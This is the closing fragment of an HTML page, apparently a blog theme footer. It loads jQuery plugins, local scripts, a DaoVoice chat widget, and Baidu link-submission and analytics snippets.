<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>






<script src="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.js"></script>






<script src="/js/utils.js"></script>
<script src="/js/modules.js"></script>
<script src="/js/zui.js"></script>
<script src="/js/script.js"></script>





<script>
  (function (i, s, o, g, r, a, m) {
    i["DaoVoiceObject"] = r;
    i[r] = i[r] || function () {
      (i[r].q = i[r].q || []).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o), m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    a.charset = "utf-8";
    m.parentNode.insertBefore(a, m)
  })(window, document, "script", ('https:' == document.location.protocol ? 'https:' : 'http:') +
    "//widget.daovoice.io/widget/0f81ff2f.js", "daovoice")
  daovoice('init', {
    app_id: "abcdefg"
  }, {
    launcher: {
      disableLauncherIcon: true,
    },
  });
  daovoice('update');
</script>



<script>
  (function () {
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
      bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    } else {
      bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
  })();
</script>


<script>
  var _hmt = _hmt || [];
  (function () {
    var hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?4c204d8bc027a0455b5fc642ac334ca8";
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
  })();
</script>










</html>